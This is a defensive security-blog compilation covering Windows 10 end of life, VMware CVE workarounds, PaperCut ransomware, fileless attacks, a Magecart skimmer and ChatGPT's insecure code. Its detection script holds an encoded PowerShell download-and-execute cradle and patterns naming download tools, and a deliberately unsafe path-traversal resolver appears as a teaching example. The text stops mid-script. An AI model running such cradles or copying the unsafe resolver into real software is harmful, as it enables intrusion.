
Microsoft: You’re already using the last version of Windows 10

Microsoft issued a client roadmap update on Thursday to remind us once again that Windows 10 support is slowly coming to an end. In less than three years, all Windows 10 users will need to have moved to Windows 11. While moving to Windows 11 should be a win for security, some Windows 10 fans may be a little nervous: upgrading isn’t always straightforward, and Windows 11’s exacting hardware requirements rule out many older machines.

According to the update, the company intends the current version of Windows 10, version 22H2, to be the last edition of the operating system (OS). That means no more significant new features for Windows 10; new functionality will go into Windows 11 instead. PCMag highlighted that this process is already underway.

Microsoft will continue to release monthly security updates for Windows 10 until October 14, 2025. After that, it will officially pull the plug for consumer editions, but not for organizations signed up to the Long-Term Servicing Channel. Support for them will extend beyond the deadline, for up to 10 years depending on the LTSC release. From Microsoft’s description:

The Long-Term Servicing Channel (LTSC) is designed for Windows 10 devices and use cases where the key requirement is that functionality and features don’t change over time. Examples include medical systems (such as those used for MRI and CAT scans), industrial process controllers, and air traffic control devices. We designed the LTSC with these types of use cases in mind, offering the promise that we will support each LTSC release for 10 years–and that features, and functionality will not change over the course of that 10-year lifecycle.

Microsoft recommends Windows 10 users switch to Windows 11 if they haven’t already done so. Despite that, Windows 10 remains hugely popular, with a 69 percent share of Windows desktops globally. Windows 11 trails significantly with just 18 percent, while Windows 7 still accounts for nine percent.

Windows 11’s low numbers may soon change as the sunset date approaches, which would be good news for security. Microsoft’s latest OS makes multiple improvements over what’s available in Windows 10. Microsoft’s approach has been to create a chain of trust that ensures the integrity of the entire hardware and software stack, from the firmware up. Many of the links in that chain rely on Virtualization Based Security (VBS), which uses the hypervisor to carve out an isolated region of memory that even a compromised Windows kernel cannot read or modify. Doing that requires hardware virtualization features, plus a TPM 2.0 and Secure Boot to anchor the chain, which is why Windows 11 has such stringent hardware requirements.

Windows 11 also includes a more effective way of warding off phishing attacks: warnings when users type their Windows password into Notepad, websites, and other programs. It also ships with a default account lockout policy (10 failed sign-in attempts lock the account for 10 minutes) to blunt Remote Desktop Protocol (RDP) brute force attacks, automated attacks in which criminals try to guess users’ passwords remotely, over RDP.

And, soon, Windows 11 will allow app developers to tap into its built-in human presence detection (HPD) capabilities to create their own experiences. HPD is a new feature that wakes and unlocks a laptop when its owner approaches, without a touch, and automatically locks it when the user walks away, which protects an unattended screen. Of course, this feature can only be used if your laptop has the sensor hardware to support it.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Update now: Critical flaw in VMware Fusion and VMware Workstation

Four vulnerabilities in virtualisation software have been fixed by VMware, including two which were exploited at the 2023 Pwn2Own contest. Three have been given the severity rating “Important”, while the last (CVE-2023-20869) is classed as “Critical”.

The four vulnerabilities are:

  • CVE-2023-20869 is a “Critical” flaw that affects Fusion and Workstation. It is a stack-based buffer overflow issue in the functionality for sharing host Bluetooth devices with the virtual machine. As per the advisory, “A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host.” Needless to say, code inside a guest is not supposed to be able to run on the host: a guest-to-host escape defeats the isolation that virtualization exists to provide.
  • CVE-2023-20870 is an “Important” flaw that affects Fusion and Workstation. It’s another issue in the functionality for sharing host Bluetooth devices, but with this one an attacker with local administrative privileges on a virtual machine can potentially read privileged information stored in the hypervisor’s memory.
  • CVE-2023-20871 is an “Important” flaw that only affects Fusion. It allows an attacker who already has read/write access to the host operating system to elevate their privileges and gain root access to the host.
  • CVE-2023-20872 is an “Important” flaw that affects Fusion and Workstation. It allows a virtual machine with a physical CD/DVD drive attached to execute code on the hypervisor, if that drive is configured to use a virtual SCSI controller.

Workarounds and updates

All four issues can be addressed by updating to the latest version of the affected software. At the time of writing these are VMware Fusion 13.0.2 and VMware Workstation 17.0.2. Workarounds are available for CVE-2023-20869, CVE-2023-20870, and CVE-2023-20872; there is no workaround for CVE-2023-20871, so Fusion users should update regardless.

CVE-2023-20869 and CVE-2023-20870 can be mitigated by turning off Bluetooth support: uncheck the “Share Bluetooth devices with the virtual machine” option in the VM’s settings. The relevant support documents for each product are VMware Workstation Pro, VMware Workstation Player, and VMware Fusion.

CVE-2023-20872 can be mitigated by removing the CD/DVD device from the virtual machine. Alternatively, you can configure the virtual machine so that it does not use a virtual SCSI controller. After shutting down the virtual machine, the steps are:

To remove the CD/DVD device in VMware Workstation:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD device and click Remove

To remove the CD/DVD device in VMware Fusion:

  • Select a virtual machine in the Virtual Machine Library window
  • Click the Virtual Machine menu
  • Click Settings
  • Under Removable Devices in the Settings window, select CD/DVD > Advanced Options > Remove CD/DVD Drive

To configure VMware Workstation not to use a virtual SCSI controller:

  • Select VM > Settings
  • Click the Hardware tab
  • Select the CD/DVD device > Advanced > CD/DVD Advanced Settings > Virtual device node
  • Change the Bus type from SCSI to one of the other controller types offered there (IDE or SATA)

To configure VMware Fusion not to use a virtual SCSI controller:

  • Select a virtual machine in the Virtual Machine Library window
  • Click the Virtual Machine menu
  • Click Settings
  • Under Removable Devices in the Settings window, select CD/DVD > Advanced options > Bus type
  • Change the Bus type from SCSI to one of the other controller types offered there (IDE or SATA)
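If you manage more than a handful of VMs, clicking through each settings dialog does not scale. As an added check (not VMware’s own tooling, and not from the advisory), the script below audits .vmx files for the two settings the workarounds above change. The key names are assumptions based on typical Workstation/Fusion configuration files: usb.vbluetooth.startConnected = "TRUE" for “Share Bluetooth devices with the virtual machine”, and a <bus>N:M.deviceType of cdrom-raw or atapi-cdrom for a physical drive (cdrom-image is an ISO and is not affected). Only the combination of a physical drive on a scsi bus is flagged for CVE-2023-20872, matching the advisory’s conditions. The sample .vmx text is constructed for the demo.

```python
"""Audit VMware .vmx files for the CVE-2023-20869/20870/20872 workaround settings.

Added example, not VMware tooling. Key names below are assumptions drawn from
typical Workstation/Fusion .vmx files; confirm against your own before relying on it.
"""
import re
from pathlib import Path

# Assumed .vmx keys:
#   usb.vbluetooth.startConnected = "TRUE"          -> Bluetooth sharing enabled
#   <bus>N:M.deviceType = "cdrom-raw"|"atapi-cdrom" -> physical (pass-through) drive
#   <bus>N:M.deviceType = "cdrom-image"             -> ISO image, not affected
PHYSICAL_CDROM_TYPES = {"cdrom-raw", "atapi-cdrom"}
DEVICE_RE = re.compile(r"^(scsi|sata|ide|nvme)(\d+):(\d+)\.(\w+)$")


def parse_vmx(text):
    """Parse key = "value" lines into a dict with lower-cased keys."""
    cfg = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        cfg[key.strip().lower()] = value.strip().strip('"')
    return cfg


def audit_vmx(cfg):
    """Return a list of findings for one parsed .vmx configuration."""
    findings = []
    if cfg.get("usb.vbluetooth.startconnected", "").lower() == "true":
        findings.append("bluetooth-sharing-enabled (CVE-2023-20869/20870)")
    for key, value in cfg.items():
        m = DEVICE_RE.match(key)
        if not m or m.group(4) != "devicetype":
            continue
        bus, ctrl, unit = m.group(1), m.group(2), m.group(3)
        # Conservative: a device with no explicit .present key is treated as present.
        present = cfg.get(f"{bus}{ctrl}:{unit}.present", "true").lower() == "true"
        if present and bus == "scsi" and value.lower() in PHYSICAL_CDROM_TYPES:
            findings.append(f"physical-cdrom-on-scsi {bus}{ctrl}:{unit} (CVE-2023-20872)")
    return findings


def audit_directory(root):
    """Walk a directory tree of VMs and map each .vmx path to its findings."""
    report = {}
    for vmx in Path(root).rglob("*.vmx"):
        findings = audit_vmx(parse_vmx(vmx.read_text(errors="replace")))
        if findings:
            report[str(vmx)] = findings
    return report


# Constructed sample: Bluetooth sharing on, a physical drive on SCSI, an ISO on SATA.
SAMPLE_VMX = """\
.encoding = "UTF-8"
config.version = "8"
displayName = "lab-vm"
usb.vbluetooth.startConnected = "TRUE"
scsi0.present = "TRUE"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "lab-vm.vmdk"
scsi0:1.present = "TRUE"
scsi0:1.deviceType = "cdrom-raw"
scsi0:1.fileName = "auto detect"
sata0:1.present = "TRUE"
sata0:1.deviceType = "cdrom-image"
sata0:1.fileName = "ubuntu.iso"
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, findings in audit_directory(sys.argv[1]).items():
            print(path)
            for f in findings:
                print("  -", f)
    else:
        print(audit_vmx(parse_vmx(SAMPLE_VMX)))
```

Run it with the directory that holds your VMs as the only argument; with no argument it audits the embedded sample and reports the Bluetooth setting and the scsi0:1 drive, but not the ISO on sata0:1.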


LockBit and Cl0p ransomware gangs actively exploiting PaperCut vulnerabilities

A few days ago we wrote about two vulnerabilities found in PaperCut application servers. As we noted, exploitation was fairly simple, so there was some urgency to install the patches. My esteemed colleague Chris Boyd wrote:

“Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit.”

As it turns out, there are already two flavors of ransomware preying on those that haven’t updated yet.

A Cl0p affiliate, tracked by Microsoft as DEV-0950, has already incorporated the PaperCut exploits into its attacks. This affiliate has also been known to use the GoAnywhere zero-day that basically brought Cl0p back from the dead last month.

In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.

Known ransomware attacks in March 2023, listed by gang

But don’t rule the habitual frontrunner LockBit out just yet. Microsoft Threat Intelligence said in a tweet that it’s “monitoring other attacks also exploiting these vulnerabilities, including intrusions leading to Lockbit deployment.”

PaperCut is print management software that works by intercepting print jobs as they pass into a print queue. It’s used by large companies, state organizations, and education institutes because it is compatible with all major printer brands and platforms. This makes a vulnerability in it, especially one that is this easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone running an unpatched server.

Both of the underlying vulnerabilities have been addressed with patches. Once you update your PaperCut application servers, they can no longer be exploited this way. Note that patching closes the hole but does not evict an attacker who already came through it, so a server that was exposed before the update should also be checked for signs of compromise. From the Updating FAQ:

  • Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
  • If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade, PaperCut advises the following:

  • Block all inbound traffic from external IPs to the web management port (ports 9191 and 9192 by default)
  • Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
  • Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Fileless attacks: How attackers evade traditional AV and how to stop them

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks, and while they can be bad, their fileless cousins are considerably harder to catch.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done; they rely instead on in-memory execution, which helps them evade detection by conventional, file-oriented security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks, which write the payload to disk and execute it from there, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly in memory instead of from the hard drive has several benefits for the attacker, such as:

  • Evasion of traditional security measures: With no file on disk to scan, fileless attacks sidestep file-signature detection and any antivirus that only inspects files, making them difficult to identify using conventional security tools.
  • Increased potential for damage: Because the payload runs inside a legitimate, trusted process, it inherits that process’s privileges and network access and can operate stealthily for longer, so it may cause more damage than a file-based attack that is caught early.
  • Memory-based attacks can be difficult to remediate: Since fileless attacks leave little or nothing on disk, there is less evidence for forensics to trace the attack back to its source, and any persistence mechanism (a registry run key or WMI subscription, for example) has to be found separately before the system can be considered clean.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

LOTL describes any attack in which the attacker leverages legitimate, already-present tools to evade detection, steal data, and so on, while fileless attacks refer purely to executing code directly in memory. The two often overlap, but they are not synonymous.

Think of them as overlapping categories rather than one being a subset of the other. Fileless attacks can and often do leverage LOTL techniques to load a payload into memory, but they can also do so without touching a legitimate system tool or process at all.

Figure: PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. (Source.)

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

  • PowerShell: A legitimate scripting environment that can download and execute code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
  • Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
  • Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
  • JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
  • Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. The document itself is a file, but the macro can fetch and run its payload without ever writing it to disk. This method takes advantage of legitimate macro functionality, making it an example of an LOTL technique as well.

Note that fileless attacks often rely on exploiting vulnerabilities in system components (such as Office or web browsers) to get their code running in the first place.

Preventing and spotting fileless attacks: Quick tips

  • Keep software and systems updated: Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
  • Regularly review security logs: Examine security logs for unusual activity or patterns that could indicate a fileless attack, such as unexpected PowerShell usage or excessive network connections.
  • Employ behavioral analytics: Use advanced threat detection tools that employ behavioral analytics to identify and block fileless attacks based on their behavior patterns.
  • Restrict macro usage: Limit the use of Microsoft Office macros by disabling them or allowing only digitally signed and trusted macros.
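“Unexpected PowerShell usage” is easier to act on with concrete patterns. The script below is an added example (not from the original post or any Malwarebytes product) that triages process-creation records, such as the command line from Windows Security Event ID 4688 or Sysmon Event ID 1, for the traits a fileless loader usually shows at once: an -EncodedCommand blob (which PowerShell decodes as UTF-16LE), a download cradle, Invoke-Expression, a hidden window and profile or execution-policy bypass flags. It decodes the blob so the indicators are matched inside the payload too. The records, weights and threshold are constructed and illustrative; tune them against your own baseline.

```python
"""Triage PowerShell process-creation records for fileless-execution indicators.

Added example, not from the original post. Sample records are constructed;
indicator weights and the alert threshold are illustrative starting points.
"""
import base64
import re

# -EncodedCommand and its accepted abbreviations (-e, -ec, -en, -enc) followed by
# a base64 blob. PowerShell decodes the blob as UTF-16LE.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:n(?:c(?:odedcommand)?)?|c)?\b\s+([A-Za-z0-9+/=]{12,})")

# (name, pattern, weight). A loader staging its payload in memory trips several
# of these together; a scheduled admin script rarely trips more than one.
INDICATORS = [
    ("encoded-command", ENC_RE, 3),
    ("download-cradle", re.compile(
        r"(?i)(New-Object\s+(System\.)?Net\.WebClient|DownloadString|DownloadFile|"
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b)"), 3),
    ("invoke-expression", re.compile(r"(?i)\b(iex|Invoke-Expression)\b"), 2),
    ("in-memory-load", re.compile(
        r"(?i)(Reflection\.Assembly\]::Load|FromBase64String|VirtualAlloc|Add-Type)"), 3),
    ("hidden-window", re.compile(r"(?i)-w(indowstyle)?\s+hidden"), 1),
    ("profile-or-policy-bypass", re.compile(
        r"(?i)(-nop\b|-noprofile\b|-noni\b|-noninteractive\b|-(ep|executionpolicy)\s+bypass)"), 1),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Score one command line; indicators are also matched inside the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    hits = [name for name, rx, _ in INDICATORS if any(rx.search(t) for t in texts)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits, decoded


def triage(records, threshold=5):
    """Return the records scoring at or above threshold, annotated with the evidence."""
    flagged = []
    for rec in records:
        score, hits, decoded = score_command(rec["cmdline"])
        if score >= threshold:
            flagged.append({**rec, "score": score, "hits": hits, "decoded": decoded})
    return flagged


def encode_command(script):
    """How an -EncodedCommand argument is built; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: one Office-spawned download cradle and two benign invocations.
SAMPLE_RECORDS = [
    {"pid": 4120, "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"pid": 5208, "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"},
    {"pid": 6112, "parent": "cmd.exe",
     "cmdline": "powershell.exe Get-Service | Where-Object Status -eq Running"},
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_RECORDS):
        print(f"pid {rec['pid']} ({rec['parent']}): score {rec['score']} {rec['hits']}")
        print("  decoded:", rec["decoded"])
```

Only the first record is flagged: the encoded flag, hidden window and -nop score on the command line itself, and the IEX download cradle scores once the blob is decoded. The parent process is carried through because an Office parent spawning PowerShell is itself worth a rule; a signed backup script launched from Explorer scores nothing.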

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

  • Go to Configure > Policies in Nebula.

  • Select a policy and navigate to Protection settings > Advanced settings > Anti-exploit settings.

Figure: Exploit Protection settings in a policy in Malwarebytes EDR.

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

  • Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
  • Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
  • Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits. 
  • Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

  • Log in to your Nebula console.
  • Navigate to Configure > Policies.
  • Click “New” or select an existing policy.
  • Choose the “Endpoint Detection and Response” tab.
  • Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

Figure: Suspicious Activity Monitoring detections in Nebula showing a possible fileless attack. On the right, the command line context for this process in our organization.

Advanced Settings offer additional options for activity monitoring. To configure these settings:

  • In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
  • Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems. 
  • Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious. 
  • Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search lets you search the endpoint events that EDR collects. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can counter fileless malware threats by monitoring process, registry, file system, and network activity on the endpoint.

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection. 


Magecart threat actor rolls out convincing modal forms

To ensnare new victims, criminals will often devise schemes that attempt to look as realistic as possible. Having said that, it is not every day that we see the fraudulent copy exceed the original piece.

While following up on an ongoing Magecart credit card skimmer campaign, we were almost fooled by a payment form that looked so well done we thought it was real. The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page.

While the technique to insert frames or layers is not new, the remarkable thing here is that the skimmer looks more authentic than the original payment page. We were able to observe several more compromised sites with the same pattern of using a custom-made and fraudulent modal.

This skimmer and associated campaigns represent one of the most active Magecart attacks we have been tracking in recent months.

Smooth checkout 

We identified a compromised online store, a Parisian travel accessory shop, running on the PrestaShop CMS. A skimmer we previously identified as Kritec was injected and loaded malicious JavaScript that altered the checkout process. In the following sections, we compare the checkout process with the skimmer active and with it blocked.

Fraudulent payment form

What we see here is the use of a ‘modal’, a web page element displayed in front of the currently active page. The modal disables and grays out the background so that the user can focus on the presented element instead. This is an elegant way for website owners to keep their customers on the same web site and have them interact with another form.

Figure 1: Compromised store loads fake payment modal

The problem is that this modal is entirely fake and designed to steal credit card data. It may sound hard to believe given everything matches to the original brand and feel of the site. Before digging further into why it is fraudulent, we will take a look at the same online store when the skimmer has been disabled.

Actual (real) payment form

In order to view this legitimate sequence, we first had to block the skimmer when requesting the e-commerce page. In our case, we simply blocked the connection to the malicious domain where the skimmer is hosted. As a result, the website will display what the original payment form should be (prior to the compromise).

Figure 2: Legitimate payment form when the same store is not compromised

The actual payment flow for this merchant is to redirect users to a third-party processor hosted by Dalenys, now part of Payplug, a French payment solutions company. So rather than display a modal, it loads the webpage for the payment processor to allow the user to enter their banking information. Once that is validated, it will take them back to the merchant page.

Malicious modal

The malicious modal is built very cleanly and contains an animation that displays the store’s logo in the middle and then moves it back up. We have to give credit where credit is due: this is a very well done skimmer that is actually a smoother user experience than the store’s default. We should also note that the malware author is not only well versed in web design, they also use proper language (French) for each form field.

Figure 3: A closer look at the fake modal

However, we noticed a small mistake in the hyperlink for Politique de confidentialité (privacy policy). That link points to Mercado Pago, a payment processor used in South America. It is likely the threat actor copied the data from a previous template and did not notice the mistake. This is just a detail and does not affect the functionality of the skimmer at all.

We can try to look for this erroneous hyperlink within the skimmer source code in order to confirm that the modal was created by the threat actor. The skimmer is rather complex and heavily obfuscated but we can see that HTML content is generated dynamically and goes through a decodeURIComponent routine.

Figure 4: Extracting code from the skimmer to reveal the connection with the modal

If we step through the code until the modal is loaded, we can grab the Base64 value corresponding to the HTML content. Once we have it, we can convert it to plain text and finally see the reference to mercadopago, which is proof that the skimmer is the one rendering this beautiful modal. In fact, we can see the whole thing is an iframe called v.ECPay:

Figure 5: The iframe created by the skimmer to display the modal

Full payment flow

We recreated the payment flow from the perspective of a customer shopping via that compromised store. We can see that upon selecting the credit card payment option, the malicious modal is loaded and will harvest their payment card details.

A fake error is then displayed briefly “votre paiment a été annulé” (your payment was cancelled) before the user is redirected to the real payment URL:

Figure 6: Payment process flow with the skimmer active

On the second attempt, the payment will go through and victims will be unaware of what just happened.

The skimmer will drop a cookie which will serve as an indication that the current session is now marked as completed. If the user was to go back and attempt the payment again, the malicious modal would no longer be displayed (instead the real payment method by the external processor Dalenys will be used).

Figure 7: Cookie dropped by skimmer once data has been stolen

Ongoing, covert campaigns

We now believe this Kritec skimmer is part of the same wave of compromises we have been tracking, in which malicious code is injected into vulnerable websites inside a Google Tag Manager script. It is possible multiple threat actors are involved in those campaigns, each customizing the skimmer accordingly.

While many hacked stores had a generic skimmer, it appears the custom modals were developed fairly recently, maybe a month or two ago. The threat actor is using different domains to host the skimmer but names them in a similar way: [name of store]-loader.js.

We crawled several thousand e-commerce sites and found more fraudulent modals, in different languages.

Figure 8: A Dutch e-commerce site with the fake modal

Figure 9: A Finnish e-commerce site with the fake modal

Discerning whether an online store is trustworthy has become very difficult and this case is a good example of a skimmer that would not raise any suspicion.

If you are a Malwarebytes customer, you will get a notification and block when attempting to make a purchase from a store that has been compromised by this skimmer.

Figure 10: Skimmer being blocked by Malwarebytes

Indicators of Compromise

Domain names

genlytec[.]us
shumtech[.]shop
zapolmob[.]sbs
daichetmob[.]sbs
interytec[.]shop
pyatiticdigt[.]shop
stacstocuh[.]quest

IP addresses

195.242.110[.]172
195.242.110[.]83
195.242.111[.]146
45.88.3[.]201
45.88.3[.]63

YARA rule

rule kritecloader
{
    strings:
        $string = "'fetchModul'"
        $string2 = "'setAttribu'"
        $string3 = "'contentWin'"
        $string4 = "'zIndex'"

    condition:
        all of them
}

Whether you are visiting an online store from home or while at work, web protection is a critical layer in your overall defense. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against threats like Magecart.


ChatGPT writes insecure code

Research by computer scientists associated with the Université du Québec in Canada has found that ChatGPT, OpenAI’s popular chatbot, is prone to generating insecure code.

“How Secure is Code Generated by ChatGPT?” is the work of Raphaël Khoury, Anderson Avila, Jacob Brunelle, and Baba Mamadou Camara. The paper concludes that ChatGPT generates code that isn’t robust, despite claiming awareness of its vulnerabilities.

“The results were worrisome,” the researchers say in the paper. “We found that, in several cases, the code generated by ChatGPT fell well below minimal security standards applicable in most contexts.”

“In fact, when prodded to whether or not the produced code was secure, ChatGPT was able to recognize that it was not. The chatbot, however, was able to provide a more secure version of the code in many cases if explicitly asked to do so.”

In the experiment, the researchers assumed the role of a novice programmer who doesn’t have security in mind. They asked ChatGPT to generate code, specifying in some cases that the code would be used in a “security-sensitive context.” What they didn’t do, however, was specifically ask the AI chatbot to create secure code or include certain security features.

ChatGPT generated 21 applications written in five programming languages: C, C++, HTML, Java, and Python. The programs are simple, with 97 lines of code at most.

In its first run, ChatGPT produced five secure applications out of 21. When prompted for changes, it made seven more secure applications from the remaining 16.

The authors note that ChatGPT only creates “secure” code when a user asks for it. When tasked with creating a simple FTP server for file sharing, it generated code without any input sanitization (checking untrusted input, such as a client-supplied file name, for harmful characters or sequences and rejecting or cleaning it). ChatGPT only added that check after the authors prompted it to do so.
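What a missing sanitization step looks like in a file-sharing server is worth seeing side by side. The following is an added example and is not the code ChatGPT produced in the paper: it assumes the relevant bug class is a client-supplied file name being joined onto the share root unchecked (the classic path traversal), and shows a naive resolver beside one that rejects absolute names, NUL bytes, “..” escapes and symlinks that lead outside the share. The temporary share and its files are constructed by the demo function.

```python
"""Client-supplied file names: the naive resolver beside a sanitized one.

Added example, not the code generated in the paper. Models the path handling
behind a file-sharing server's RETR/STOR commands.
"""
import os
import tempfile


def unsafe_resolve(share_root, requested):
    """Naive version: joins the client's name onto the root and trusts the result.
    '../x' walks out of the share, and an absolute name replaces the root entirely."""
    return os.path.join(share_root, requested)


def safe_resolve(share_root, requested):
    """Sanitized version: returns a path inside share_root or raises PermissionError."""
    root = os.path.realpath(share_root)
    if "\x00" in requested:            # NUL truncates the name in C-level file APIs
        raise PermissionError("NUL byte in file name")
    if os.path.isabs(requested):       # an absolute name would discard the root
        raise PermissionError("absolute path not allowed")
    # realpath normalizes '..' and follows symlinks, so the containment check
    # below is made against the file that would actually be opened.
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"{requested!r} escapes the share")
    return candidate


def verdicts(share_root, names):
    """Run the sanitized resolver over client-supplied names and record its decision."""
    out = {}
    for name in names:
        try:
            safe_resolve(share_root, name)
            out[name] = "allowed"
        except PermissionError:
            out[name] = "rejected"
    return out


def demo():
    """Build a throwaway share, plant a symlink that points outside it, and test names."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "share")
        os.makedirs(os.path.join(share, "docs"))
        open(os.path.join(share, "docs", "readme.txt"), "w").close()
        open(os.path.join(tmp, "secret.txt"), "w").close()   # outside the share
        names = ["docs/readme.txt", "../secret.txt", "/etc/passwd", "docs\x00/readme.txt"]
        try:
            os.symlink(os.path.join(tmp, "secret.txt"), os.path.join(share, "link"))
            names.append("link")
        except OSError:
            pass   # symlinks unavailable (e.g. unprivileged Windows); skip that case
        return verdicts(share, names)


if __name__ == "__main__":
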